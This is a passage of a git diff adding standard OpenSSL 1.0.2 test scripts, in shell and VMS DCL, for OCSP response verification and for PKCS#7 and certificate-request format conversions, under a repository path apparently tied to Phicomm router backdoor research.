+		-CAfile $ocspdir/$2 -verify_other $ocspdir/$2 -CApath /dev/null
+	[ $? != $3 ] && exit 1
+}
+
+
+echo "=== VALID OCSP RESPONSES ==="
+echo "NON-DELEGATED; Intermediate CA -> EE"
+test_ocsp ND1.ors ND1_Issuer_ICA.pem 0
+echo "NON-DELEGATED; Root CA -> Intermediate CA"
+test_ocsp ND2.ors ND2_Issuer_Root.pem 0
+echo "NON-DELEGATED; Root CA -> EE"
+test_ocsp ND3.ors ND3_Issuer_Root.pem 0
+echo "DELEGATED; Intermediate CA -> EE"
+test_ocsp D1.ors D1_Issuer_ICA.pem 0
+echo "DELEGATED; Root CA -> Intermediate CA"
+test_ocsp D2.ors D2_Issuer_Root.pem 0
+echo "DELEGATED; Root CA -> EE"
+test_ocsp D3.ors D3_Issuer_Root.pem 0
+
+echo "=== INVALID SIGNATURE on the OCSP RESPONSE ==="
+echo "NON-DELEGATED; Intermediate CA -> EE"
+test_ocsp ISOP_ND1.ors ND1_Issuer_ICA.pem 1
+echo "NON-DELEGATED; Root CA -> Intermediate CA"
+test_ocsp ISOP_ND2.ors ND2_Issuer_Root.pem 1
+echo "NON-DELEGATED; Root CA -> EE"
+test_ocsp ISOP_ND3.ors ND3_Issuer_Root.pem 1
+echo "DELEGATED; Intermediate CA -> EE"
+test_ocsp ISOP_D1.ors D1_Issuer_ICA.pem 1
+echo "DELEGATED; Root CA -> Intermediate CA"
+test_ocsp ISOP_D2.ors D2_Issuer_Root.pem 1
+echo "DELEGATED; Root CA -> EE"
+test_ocsp ISOP_D3.ors D3_Issuer_Root.pem 1
+
+echo "=== WRONG RESPONDERID in the OCSP RESPONSE ==="
+echo "NON-DELEGATED; Intermediate CA -> EE"
+test_ocsp WRID_ND1.ors ND1_Issuer_ICA.pem 1
+echo "NON-DELEGATED; Root CA -> Intermediate CA"
+test_ocsp WRID_ND2.ors ND2_Issuer_Root.pem 1
+echo "NON-DELEGATED; Root CA -> EE"
+test_ocsp WRID_ND3.ors ND3_Issuer_Root.pem 1
+echo "DELEGATED; Intermediate CA -> EE"
+test_ocsp WRID_D1.ors D1_Issuer_ICA.pem 1
+echo "DELEGATED; Root CA -> Intermediate CA"
+test_ocsp WRID_D2.ors D2_Issuer_Root.pem 1
+echo "DELEGATED; Root CA -> EE"
+test_ocsp WRID_D3.ors D3_Issuer_Root.pem 1
+
+echo "=== WRONG ISSUERNAMEHASH in the OCSP RESPONSE ==="
+echo "NON-DELEGATED; Intermediate CA -> EE"
+test_ocsp WINH_ND1.ors ND1_Issuer_ICA.pem 1
+echo "NON-DELEGATED; Root CA -> Intermediate CA"
+test_ocsp WINH_ND2.ors ND2_Issuer_Root.pem 1
+echo "NON-DELEGATED; Root CA -> EE"
+test_ocsp WINH_ND3.ors ND3_Issuer_Root.pem 1
+echo "DELEGATED; Intermediate CA -> EE"
+test_ocsp WINH_D1.ors D1_Issuer_ICA.pem 1
+echo "DELEGATED; Root CA -> Intermediate CA"
+test_ocsp WINH_D2.ors D2_Issuer_Root.pem 1
+echo "DELEGATED; Root CA -> EE"
+test_ocsp WINH_D3.ors D3_Issuer_Root.pem 1
+
+echo "=== WRONG ISSUERKEYHASH in the OCSP RESPONSE ==="
+echo "NON-DELEGATED; Intermediate CA -> EE"
+test_ocsp WIKH_ND1.ors ND1_Issuer_ICA.pem 1
+echo "NON-DELEGATED; Root CA -> Intermediate CA"
+test_ocsp WIKH_ND2.ors ND2_Issuer_Root.pem 1
+echo "NON-DELEGATED; Root CA -> EE"
+test_ocsp WIKH_ND3.ors ND3_Issuer_Root.pem 1
+echo "DELEGATED; Intermediate CA -> EE"
+test_ocsp WIKH_D1.ors D1_Issuer_ICA.pem 1
+echo "DELEGATED; Root CA -> Intermediate CA"
+test_ocsp WIKH_D2.ors D2_Issuer_Root.pem 1
+echo "DELEGATED; Root CA -> EE"
+test_ocsp WIKH_D3.ors D3_Issuer_Root.pem 1
+
+echo "=== WRONG KEY in the DELEGATED OCSP SIGNING CERTIFICATE ==="
+echo "DELEGATED; Intermediate CA -> EE"
+test_ocsp WKDOSC_D1.ors D1_Issuer_ICA.pem 1
+echo "DELEGATED; Root CA -> Intermediate CA"
+test_ocsp WKDOSC_D2.ors D2_Issuer_Root.pem 1
+echo "DELEGATED; Root CA -> EE"
+test_ocsp WKDOSC_D3.ors D3_Issuer_Root.pem 1
+
+echo "=== INVALID SIGNATURE on the DELEGATED OCSP SIGNING CERTIFICATE ==="
+echo "DELEGATED; Intermediate CA -> EE"
+test_ocsp ISDOSC_D1.ors D1_Issuer_ICA.pem 1
+echo "DELEGATED; Root CA -> Intermediate CA"
+test_ocsp ISDOSC_D2.ors D2_Issuer_Root.pem 1
+echo "DELEGATED; Root CA -> EE"
+test_ocsp ISDOSC_D3.ors D3_Issuer_Root.pem 1
+
+echo "=== WRONG SUBJECT NAME in the ISSUER CERTIFICATE ==="
+echo "NON-DELEGATED; Intermediate CA -> EE"
+test_ocsp ND1.ors WSNIC_ND1_Issuer_ICA.pem 1
+echo "NON-DELEGATED; Root CA -> Intermediate CA"
+test_ocsp ND2.ors WSNIC_ND2_Issuer_Root.pem 1
+echo "NON-DELEGATED; Root CA -> EE"
+test_ocsp ND3.ors WSNIC_ND3_Issuer_Root.pem 1
+echo "DELEGATED; Intermediate CA -> EE"
+test_ocsp D1.ors WSNIC_D1_Issuer_ICA.pem 1
+echo "DELEGATED; Root CA -> Intermediate CA"
+test_ocsp D2.ors WSNIC_D2_Issuer_Root.pem 1
+echo "DELEGATED; Root CA -> EE"
+test_ocsp D3.ors WSNIC_D3_Issuer_Root.pem 1
+
+echo "=== WRONG KEY in the ISSUER CERTIFICATE ==="
+echo "NON-DELEGATED; Intermediate CA -> EE"
+test_ocsp ND1.ors WKIC_ND1_Issuer_ICA.pem 1
+echo "NON-DELEGATED; Root CA -> Intermediate CA"
+test_ocsp ND2.ors WKIC_ND2_Issuer_Root.pem 1
+echo "NON-DELEGATED; Root CA -> EE"
+test_ocsp ND3.ors WKIC_ND3_Issuer_Root.pem 1
+echo "DELEGATED; Intermediate CA -> EE"
+test_ocsp D1.ors WKIC_D1_Issuer_ICA.pem 1
+echo "DELEGATED; Root CA -> Intermediate CA"
+test_ocsp D2.ors WKIC_D2_Issuer_Root.pem 1
+echo "DELEGATED; Root CA -> EE"
+test_ocsp D3.ors WKIC_D3_Issuer_Root.pem 1
+
+echo "=== INVALID SIGNATURE on the ISSUER CERTIFICATE ==="
+# Expect success, because we're explicitly trusting the issuer certificate.
+echo "NON-DELEGATED; Intermediate CA -> EE"
+test_ocsp ND1.ors ISIC_ND1_Issuer_ICA.pem 0
+echo "NON-DELEGATED; Root CA -> Intermediate CA"
+test_ocsp ND2.ors ISIC_ND2_Issuer_Root.pem 0
+echo "NON-DELEGATED; Root CA -> EE"
+test_ocsp ND3.ors ISIC_ND3_Issuer_Root.pem 0
+echo "DELEGATED; Intermediate CA -> EE"
+test_ocsp D1.ors ISIC_D1_Issuer_ICA.pem 0
+echo "DELEGATED; Root CA -> Intermediate CA"
+test_ocsp D2.ors ISIC_D2_Issuer_Root.pem 0
+echo "DELEGATED; Root CA -> EE"
+test_ocsp D3.ors ISIC_D3_Issuer_Root.pem 0
+
+echo "ALL OCSP TESTS SUCCESSFUL"
+exit 0
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/tocsp.com b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/tocsp.com
new file mode 100644
index 0000000..3b974c9
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/tocsp.com
@@ -0,0 +1,152 @@
+$! TOCSP.COM
+$
+$	cmd = "mcr ''exe_dir'openssl"
+$	ocspdir = "ocsp-tests"
+$	! 17 December 2012 so we don't get certificate expiry errors.
+$	check_time = "-attime 1355875200"
+$
+$ test_ocsp: subroutine
+$	set noon
+$	'cmd' base64 -d -in [.'ocspdir']'p1' -out f.d
+$	'cmd' ocsp -respin f.d -partial_chain 'check_time' -
+	      "-CAfile" [.'ocspdir']'p2' -verify_other [.'ocspdir']'p2' -
+	      "-CApath" nul:
+$	! when ocsp exits with 0, VMS severity becomes 1
+$	! when ocsp exits with 1, VMS severity becomes 2
+$	! See the definition of EXIT(n) in the VMS sextion in e_os.h
+$	if $severity .ne. 'p3'+1 then exit 2 ! severity error
+$	exit 1
+$	endsubroutine
+$
+$	on error then exit 2
+$	write sys$output "=== VALID OCSP RESPONSES ==="
+$	write sys$output "NON-DELEGATED; Intermediate CA -> EE"
+$	call test_ocsp ND1.ors ND1_Issuer_ICA.pem 0
+$	write sys$output "NON-DELEGATED; Root CA -> Intermediate CA"
+$	call test_ocsp ND2.ors ND2_Issuer_Root.pem 0
+$	write sys$output "NON-DELEGATED; Root CA -> EE"
+$	call test_ocsp ND3.ors ND3_Issuer_Root.pem 0
+$	write sys$output "DELEGATED; Intermediate CA -> EE"
+$	call test_ocsp D1.ors D1_Issuer_ICA.pem 0
+$	write sys$output "DELEGATED; Root CA -> Intermediate CA"
+$	call test_ocsp D2.ors D2_Issuer_Root.pem 0
+$	write sys$output "DELEGATED; Root CA -> EE"
+$	call test_ocsp D3.ors D3_Issuer_Root.pem 0
+$
+$	write sys$output "=== INVALID SIGNATURE on the OCSP RESPONSE ==="
+$	write sys$output "NON-DELEGATED; Intermediate CA -> EE"
+$	call test_ocsp ISOP_ND1.ors ND1_Issuer_ICA.pem 1
+$	write sys$output "NON-DELEGATED; Root CA -> Intermediate CA"
+$	call test_ocsp ISOP_ND2.ors ND2_Issuer_Root.pem 1
+$	write sys$output "NON-DELEGATED; Root CA -> EE"
+$	call test_ocsp ISOP_ND3.ors ND3_Issuer_Root.pem 1
+$	write sys$output "DELEGATED; Intermediate CA -> EE"
+$	call test_ocsp ISOP_D1.ors D1_Issuer_ICA.pem 1
+$	write sys$output "DELEGATED; Root CA -> Intermediate CA"
+$	call test_ocsp ISOP_D2.ors D2_Issuer_Root.pem 1
+$	write sys$output "DELEGATED; Root CA -> EE"
+$	call test_ocsp ISOP_D3.ors D3_Issuer_Root.pem 1
+$
+$	write sys$output "=== WRONG RESPONDERID in the OCSP RESPONSE ==="
+$	write sys$output "NON-DELEGATED; Intermediate CA -> EE"
+$	call test_ocsp WRID_ND1.ors ND1_Issuer_ICA.pem 1
+$	write sys$output "NON-DELEGATED; Root CA -> Intermediate CA"
+$	call test_ocsp WRID_ND2.ors ND2_Issuer_Root.pem 1
+$	write sys$output "NON-DELEGATED; Root CA -> EE"
+$	call test_ocsp WRID_ND3.ors ND3_Issuer_Root.pem 1
+$	write sys$output "DELEGATED; Intermediate CA -> EE"
+$	call test_ocsp WRID_D1.ors D1_Issuer_ICA.pem 1
+$	write sys$output "DELEGATED; Root CA -> Intermediate CA"
+$	call test_ocsp WRID_D2.ors D2_Issuer_Root.pem 1
+$	write sys$output "DELEGATED; Root CA -> EE"
+$	call test_ocsp WRID_D3.ors D3_Issuer_Root.pem 1
+$
+$	write sys$output "=== WRONG ISSUERNAMEHASH in the OCSP RESPONSE ==="
+$	write sys$output "NON-DELEGATED; Intermediate CA -> EE"
+$	call test_ocsp WINH_ND1.ors ND1_Issuer_ICA.pem 1
+$	write sys$output "NON-DELEGATED; Root CA -> Intermediate CA"
+$	call test_ocsp WINH_ND2.ors ND2_Issuer_Root.pem 1
+$	write sys$output "NON-DELEGATED; Root CA -> EE"
+$	call test_ocsp WINH_ND3.ors ND3_Issuer_Root.pem 1
+$	write sys$output "DELEGATED; Intermediate CA -> EE"
+$	call test_ocsp WINH_D1.ors D1_Issuer_ICA.pem 1
+$	write sys$output "DELEGATED; Root CA -> Intermediate CA"
+$	call test_ocsp WINH_D2.ors D2_Issuer_Root.pem 1
+$	write sys$output "DELEGATED; Root CA -> EE"
+$	call test_ocsp WINH_D3.ors D3_Issuer_Root.pem 1
+$
+$	write sys$output "=== WRONG ISSUERKEYHASH in the OCSP RESPONSE ==="
+$	write sys$output "NON-DELEGATED; Intermediate CA -> EE"
+$	call test_ocsp WIKH_ND1.ors ND1_Issuer_ICA.pem 1
+$	write sys$output "NON-DELEGATED; Root CA -> Intermediate CA"
+$	call test_ocsp WIKH_ND2.ors ND2_Issuer_Root.pem 1
+$	write sys$output "NON-DELEGATED; Root CA -> EE"
+$	call test_ocsp WIKH_ND3.ors ND3_Issuer_Root.pem 1
+$	write sys$output "DELEGATED; Intermediate CA -> EE"
+$	call test_ocsp WIKH_D1.ors D1_Issuer_ICA.pem 1
+$	write sys$output "DELEGATED; Root CA -> Intermediate CA"
+$	call test_ocsp WIKH_D2.ors D2_Issuer_Root.pem 1
+$	write sys$output "DELEGATED; Root CA -> EE"
+$	call test_ocsp WIKH_D3.ors D3_Issuer_Root.pem 1
+$
+$	write sys$output "=== WRONG KEY in the DELEGATED OCSP SIGNING CERTIFICATE ==="
+$	write sys$output "DELEGATED; Intermediate CA -> EE"
+$	call test_ocsp WKDOSC_D1.ors D1_Issuer_ICA.pem 1
+$	write sys$output "DELEGATED; Root CA -> Intermediate CA"
+$	call test_ocsp WKDOSC_D2.ors D2_Issuer_Root.pem 1
+$	write sys$output "DELEGATED; Root CA -> EE"
+$	call test_ocsp WKDOSC_D3.ors D3_Issuer_Root.pem 1
+$
+$	write sys$output "=== INVALID SIGNATURE on the DELEGATED OCSP SIGNING CERTIFICATE ==="
+$	write sys$output "DELEGATED; Intermediate CA -> EE"
+$	call test_ocsp ISDOSC_D1.ors D1_Issuer_ICA.pem 1
+$	write sys$output "DELEGATED; Root CA -> Intermediate CA"
+$	call test_ocsp ISDOSC_D2.ors D2_Issuer_Root.pem 1
+$	write sys$output "DELEGATED; Root CA -> EE"
+$	call test_ocsp ISDOSC_D3.ors D3_Issuer_Root.pem 1
+$
+$	write sys$output "=== WRONG SUBJECT NAME in the ISSUER CERTIFICATE ==="
+$	write sys$output "NON-DELEGATED; Intermediate CA -> EE"
+$	call test_ocsp ND1.ors WSNIC_ND1_Issuer_ICA.pem 1
+$	write sys$output "NON-DELEGATED; Root CA -> Intermediate CA"
+$	call test_ocsp ND2.ors WSNIC_ND2_Issuer_Root.pem 1
+$	write sys$output "NON-DELEGATED; Root CA -> EE"
+$	call test_ocsp ND3.ors WSNIC_ND3_Issuer_Root.pem 1
+$	write sys$output "DELEGATED; Intermediate CA -> EE"
+$	call test_ocsp D1.ors WSNIC_D1_Issuer_ICA.pem 1
+$	write sys$output "DELEGATED; Root CA -> Intermediate CA"
+$	call test_ocsp D2.ors WSNIC_D2_Issuer_Root.pem 1
+$	write sys$output "DELEGATED; Root CA -> EE"
+$	call test_ocsp D3.ors WSNIC_D3_Issuer_Root.pem 1
+$
+$	write sys$output "=== WRONG KEY in the ISSUER CERTIFICATE ==="
+$	write sys$output "NON-DELEGATED; Intermediate CA -> EE"
+$	call test_ocsp ND1.ors WKIC_ND1_Issuer_ICA.pem 1
+$	write sys$output "NON-DELEGATED; Root CA -> Intermediate CA"
+$	call test_ocsp ND2.ors WKIC_ND2_Issuer_Root.pem 1
+$	write sys$output "NON-DELEGATED; Root CA -> EE"
+$	call test_ocsp ND3.ors WKIC_ND3_Issuer_Root.pem 1
+$	write sys$output "DELEGATED; Intermediate CA -> EE"
+$	call test_ocsp D1.ors WKIC_D1_Issuer_ICA.pem 1
+$	write sys$output "DELEGATED; Root CA -> Intermediate CA"
+$	call test_ocsp D2.ors WKIC_D2_Issuer_Root.pem 1
+$	write sys$output "DELEGATED; Root CA -> EE"
+$	call test_ocsp D3.ors WKIC_D3_Issuer_Root.pem 1
+$
+$	write sys$output "=== INVALID SIGNATURE on the ISSUER CERTIFICATE ==="
+$	!# Expect success, because we're explicitly trusting the issuer certificate.
+$	write sys$output "NON-DELEGATED; Intermediate CA -> EE"
+$	call test_ocsp ND1.ors ISIC_ND1_Issuer_ICA.pem 0
+$	write sys$output "NON-DELEGATED; Root CA -> Intermediate CA"
+$	call test_ocsp ND2.ors ISIC_ND2_Issuer_Root.pem 0
+$	write sys$output "NON-DELEGATED; Root CA -> EE"
+$	call test_ocsp ND3.ors ISIC_ND3_Issuer_Root.pem 0
+$	write sys$output "DELEGATED; Intermediate CA -> EE"
+$	call test_ocsp D1.ors ISIC_D1_Issuer_ICA.pem 0
+$	write sys$output "DELEGATED; Root CA -> Intermediate CA"
+$	call test_ocsp D2.ors ISIC_D2_Issuer_Root.pem 0
+$	write sys$output "DELEGATED; Root CA -> EE"
+$	call test_ocsp D3.ors ISIC_D3_Issuer_Root.pem 0
+$
+$	write sys$output "ALL OCSP TESTS SUCCESSFUL"
+$	exit 1
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/tpkcs7 b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/tpkcs7
new file mode 100644
index 0000000..d7029a0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/tpkcs7
@@ -0,0 +1,48 @@
+#!/bin/sh
+
+cmd='../util/shlib_wrap.sh ../apps/openssl pkcs7'
+
+if [ "$1"x != "x" ]; then
+	t=$1
+else
+	t=testp7.pem
+fi
+
+echo testing pkcs7 conversions
+cp $t p7-fff.p
+
+echo "p -> d"
+$cmd -in p7-fff.p -inform p -outform d >p7-f.d
+if [ $? != 0 ]; then exit 1; fi
+echo "p -> p"
+$cmd -in p7-fff.p -inform p -outform p >p7-f.p
+if [ $? != 0 ]; then exit 1; fi
+
+echo "d -> d"
+$cmd -in p7-f.d -inform d -outform d >p7-ff.d1
+if [ $? != 0 ]; then exit 1; fi
+echo "p -> d"
+$cmd -in p7-f.p -inform p -outform d >p7-ff.d3
+if [ $? != 0 ]; then exit 1; fi
+
+echo "d -> p"
+$cmd -in p7-f.d -inform d -outform p >p7-ff.p1
+if [ $? != 0 ]; then exit 1; fi
+echo "p -> p"
+$cmd -in p7-f.p -inform p -outform p >p7-ff.p3
+if [ $? != 0 ]; then exit 1; fi
+
+cmp p7-fff.p p7-f.p
+if [ $? != 0 ]; then exit 1; fi
+cmp p7-fff.p p7-ff.p1
+if [ $? != 0 ]; then exit 1; fi
+cmp p7-fff.p p7-ff.p3
+if [ $? != 0 ]; then exit 1; fi
+
+cmp p7-f.p p7-ff.p1
+if [ $? != 0 ]; then exit 1; fi
+cmp p7-f.p p7-ff.p3
+if [ $? != 0 ]; then exit 1; fi
+
+/bin/rm -f p7-f.* p7-ff.* p7-fff.*
+exit 0
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/tpkcs7.com b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/tpkcs7.com
new file mode 100644
index 0000000..3fc4982
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/tpkcs7.com
@@ -0,0 +1,59 @@
+$! TPKCS7.COM  --  Tests pkcs7 keys
+$
+$	__arch = "VAX"
+$	if f$getsyi("cpu") .ge. 128 then -
+	   __arch = f$edit( f$getsyi( "ARCH_NAME"), "UPCASE")
+$	if __arch .eqs. "" then __arch = "UNK"
+$!
+$	if (p2 .eqs. "64") then __arch = __arch+ "_64"
+$!
+$	exe_dir = "sys$disk:[-.''__arch'.exe.apps]"
+$
+$	cmd = "mcr ''exe_dir'openssl pkcs7"
+$
+$	t = "testp7.pem"
+$	if p1 .nes. "" then t = p1
+$
+$	write sys$output "testing PKCS7 conversions"
+$	if f$search("fff.*") .nes "" then delete fff.*;*
+$	if f$search("ff.*") .nes "" then delete ff.*;*
+$	if f$search("f.*") .nes "" then delete f.*;*
+$	convert/fdl=sys$input: 't' fff.p
+RECORD
+	FORMAT STREAM_LF
+$
+$	write sys$output "p -> d"
+$	'cmd' -in fff.p -inform p -outform d -out f.d
+$	if $severity .ne. 1 then exit 3
+$	write sys$output "p -> p"
+$	'cmd' -in fff.p -inform p -outform p -out f.p
+$	if $severity .ne. 1 then exit 3
+$
+$	write sys$output "d -> d"
+$	'cmd' -in f.d -inform d -outform d -out ff.d1
+$	if $severity .ne. 1 then exit 3
+$	write sys$output "p -> d"
+$	'cmd' -in f.p -inform p -outform d -out ff.d3
+$	if $severity .ne. 1 then exit 3
+$
+$
+$	write sys$output "d -> p"
+$	'cmd' -in f.d -inform d -outform p -out ff.p1
+$	if $severity .ne. 1 then exit 3
+$	write sys$output "p -> p"
+$	'cmd' -in f.p -inform p -outform p -out ff.p3
+$	if $severity .ne. 1 then exit 3
+$
+$	backup/compare fff.p f.p
+$	if $severity .ne. 1 then exit 3
+$	backup/compare fff.p ff.p1
+$	if $severity .ne. 1 then exit 3
+$	backup/compare fff.p ff.p3
+$	if $severity .ne. 1 then exit 3
+$
+$	backup/compare f.p ff.p1
+$	if $severity .ne. 1 then exit 3
+$	backup/compare f.p ff.p3
+$	if $severity .ne. 1 then exit 3
+$
+$	delete f.*;*,ff.*;*,fff.*;*
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/tpkcs7d b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/tpkcs7d
new file mode 100644
index 0000000..d4bfbdf
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/tpkcs7d
@@ -0,0 +1,41 @@
+#!/bin/sh
+
+cmd='../util/shlib_wrap.sh ../apps/openssl pkcs7'
+
+if [ "$1"x != "x" ]; then
+	t=$1
+else
+	t=pkcs7-1.pem
+fi
+
+echo "testing pkcs7 conversions (2)"
+cp $t p7d-fff.p
+
+echo "p -> d"
+$cmd -in p7d-fff.p -inform p -outform d >p7d-f.d
+if [ $? != 0 ]; then exit 1; fi
+echo "p -> p"
+$cmd -in p7d-fff.p -inform p -outform p >p7d-f.p
+if [ $? != 0 ]; then exit 1; fi
+
+echo "d -> d"
+$cmd -in p7d-f.d -inform d -outform d >p7d-ff.d1
+if [ $? != 0 ]; then exit 1; fi
+echo "p -> d"
+$cmd -in p7d-f.p -inform p -outform d >p7d-ff.d3
+if [ $? != 0 ]; then exit 1; fi
+
+echo "d -> p"
+$cmd -in p7d-f.d -inform d -outform p >p7d-ff.p1
+if [ $? != 0 ]; then exit 1; fi
+echo "p -> p"
+$cmd -in p7d-f.p -inform p -outform p >p7d-ff.p3
+if [ $? != 0 ]; then exit 1; fi
+
+cmp p7d-f.p p7d-ff.p1
+if [ $? != 0 ]; then exit 1; fi
+cmp p7d-f.p p7d-ff.p3
+if [ $? != 0 ]; then exit 1; fi
+
+/bin/rm -f p7d-f.* p7d-ff.* p7d-fff.*
+exit 0
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/tpkcs7d.com b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/tpkcs7d.com
new file mode 100644
index 0000000..eea8c88
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/tpkcs7d.com
@@ -0,0 +1,52 @@
+$! TPKCS7.COM  --  Tests pkcs7 keys
+$
+$	__arch = "VAX"
+$	if f$getsyi("cpu") .ge. 128 then -
+	   __arch = f$edit( f$getsyi( "ARCH_NAME"), "UPCASE")
+$	if __arch .eqs. "" then __arch = "UNK"
+$!
+$	if (p2 .eqs. "64") then __arch = __arch+ "_64"
+$!
+$	exe_dir = "sys$disk:[-.''__arch'.exe.apps]"
+$
+$	cmd = "mcr ''exe_dir'openssl pkcs7"
+$
+$	t = "pkcs7-1.pem"
+$	if p1 .nes. "" then t = p1
+$
+$	write sys$output "testing PKCS7 conversions (2)"
+$	if f$search("fff.*") .nes "" then delete fff.*;*
+$	if f$search("ff.*") .nes "" then delete ff.*;*
+$	if f$search("f.*") .nes "" then delete f.*;*
+$	convert/fdl=sys$input: 't' fff.p
+RECORD
+	FORMAT STREAM_LF
+$
+$	write sys$output "p -> d"
+$	'cmd' -in fff.p -inform p -outform d -out f.d
+$	if $severity .ne. 1 then exit 3
+$	write sys$output "p -> p"
+$	'cmd' -in fff.p -inform p -outform p -out f.p
+$	if $severity .ne. 1 then exit 3
+$
+$	write sys$output "d -> d"
+$	'cmd' -in f.d -inform d -outform d -out ff.d1
+$	if $severity .ne. 1 then exit 3
+$	write sys$output "p -> d"
+$	'cmd' -in f.p -inform p -outform d -out ff.d3
+$	if $severity .ne. 1 then exit 3
+$
+$
+$	write sys$output "d -> p"
+$	'cmd' -in f.d -inform d -outform p -out ff.p1
+$	if $severity .ne. 1 then exit 3
+$	write sys$output "p -> p"
+$	'cmd' -in f.p -inform p -outform p -out ff.p3
+$	if $severity .ne. 1 then exit 3
+$
+$	backup/compare f.p ff.p1
+$	if $severity .ne. 1 then exit 3
+$	backup/compare f.p ff.p3
+$	if $severity .ne. 1 then exit 3
+$
+$	delete f.*;*,ff.*;*,fff.*;*
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/treq b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/treq
new file mode 100644
index 0000000..420d25e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/treq
@@ -0,0 +1,83 @@
+#!/bin/sh
+
+cmd='../util/shlib_wrap.sh ../apps/openssl req -config ../apps/openssl.cnf'
+
+if [ "$1"x != "x" ]; then
+	t=$1
+else
+	t=testreq.pem
+fi
+
+if $cmd -in $t -inform p -noout -text 2>&1 | fgrep -i 'Unknown Public Key'; then
+  echo "skipping req conversion test for $t"
+  exit 0
+fi
+
+echo testing req conversions
+cp $t req-fff.p
+
+echo "p -> d"
+$cmd -in req-fff.p -inform p -outform d >req-f.d
+if [ $? != 0 ]; then exit 1; fi
+#echo "p -> t"
+#$cmd -in req-fff.p -inform p -outform t >req-f.t
+#if [ $? != 0 ]; then exit 1; fi
+echo "p -> p"
+$cmd -in req-fff.p -inform p -outform p >req-f.p
+if [ $? != 0 ]; then exit 1; fi
+
+echo "d -> d"
+$cmd -verify -in req-f.d -inform d -outform d >req-ff.d1
+if [ $? != 0 ]; then exit 1; fi
+#echo "t -> d"
+#$cmd -in req-f.t -inform t -outform d >req-ff.d2
+#if [ $? != 0 ]; then exit 1; fi
+echo "p -> d"
+$cmd -verify -in req-f.p -inform p -outform d >req-ff.d3
+if [ $? != 0 ]; then exit 1; fi
+
+#echo "d -> t"
+#$cmd -in req-f.d -inform d -outform t >req-ff.t1
+#if [ $? != 0 ]; then exit 1; fi
+#echo "t -> t"
+#$cmd -in req-f.t -inform t -outform t >req-ff.t2
+#if [ $? != 0 ]; then exit 1; fi
+#echo "p -> t"
+#$cmd -in req-f.p -inform p -outform t >req-ff.t3
+#if [ $? != 0 ]; then exit 1; fi
+
+echo "d -> p"
+$cmd -in req-f.d -inform d -outform p >req-ff.p1
+if [ $? != 0 ]; then exit 1; fi
+#echo "t -> p"
+#$cmd -in req-f.t -inform t -outform p >req-ff.p2
+#if [ $? != 0 ]; then exit 1; fi
+echo "p -> p"
+$cmd -in req-f.p -inform p -outform p >req-ff.p3
+if [ $? != 0 ]; then exit 1; fi
+
+cmp req-fff.p req-f.p
+if [ $? != 0 ]; then exit 1; fi
+cmp req-fff.p req-ff.p1
+if [ $? != 0 ]; then exit 1; fi
+#cmp req-fff.p req-ff.p2
+#if [ $? != 0 ]; then exit 1; fi
+cmp req-fff.p req-ff.p3
+if [ $? != 0 ]; then exit 1; fi
+
+#cmp req-f.t req-ff.t1
+#if [ $? != 0 ]; then exit 1; fi
+#cmp req-f.t req-ff.t2
+#if [ $? != 0 ]; then exit 1; fi
+#cmp req-f.t req-ff.t3
+#if [ $? != 0 ]; then exit 1; fi
+
+cmp req-f.p req-ff.p1
+if [ $? != 0 ]; then exit 1; fi
+#cmp req-f.p req-ff.p2
+#if [ $? != 0 ]; then exit 1; fi
+cmp req-f.p req-ff.p3
+if [ $? != 0 ]; then exit 1; fi
+
+/bin/rm -f req-f.* req-ff.* req-fff.*
+exit 0
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/treq.com b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/treq.com
new file mode 100644
index 0000000..acf08b7
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/treq.com
@@ -0,0 +1,88 @@
+$! TREQ.COM  --  Tests req keys
+$
+$	__arch = "VAX"
+$	if f$getsyi("cpu") .ge. 128 then -
+	   __arch = f$edit( f$getsyi( "ARCH_NAME"), "UPCASE")
+$	if __arch .eqs. "" then __arch = "UNK"
+$!
+$	if (p2 .eqs. "64") then __arch = __arch+ "_64"
+$!
+$	exe_dir = "sys$disk:[-.''__arch'.exe.apps]"
+$
+$	cmd = "mcr ''exe_dir'openssl req -config [-.apps]openssl-vms.cnf"
+$
+$	t = "testreq.pem"
+$	if p1 .nes. "" then t = p1
+$
+$	write sys$output "testing req conversions"
+$	if f$search("fff.*") .nes "" then delete fff.*;*
+$	if f$search("ff.*") .nes "" then delete ff.*;*
+$	if f$search("f.*") .nes "" then delete f.*;*
+$	convert/fdl=sys$input: 't' fff.p
+RECORD
+	FORMAT STREAM_LF
+$
+$	write sys$output "p -> d"
+$	'cmd' -in fff.p -inform p -outform d -out f.d
+$	if $severity .ne. 1 then exit 3
+$!	write sys$output "p -> t"
+$!	'cmd' -in fff.p -inform p -outform t -out f.t
+$!	if $severity .ne. 1 then exit 3
+$	write sys$output "p -> p"
+$	'cmd' -in fff.p -inform p -outform p -out f.p
+$	if $severity .ne. 1 then exit 3
+$
+$	write sys$output "d -> d"
+$	'cmd' -verify -in f.d -inform d -outform d -out ff.d1
+$	if $severity .ne. 1 then exit 3
+$!	write sys$output "t -> d"
+$!	'cmd' -verify -in f.t -inform t -outform d -out ff.d2
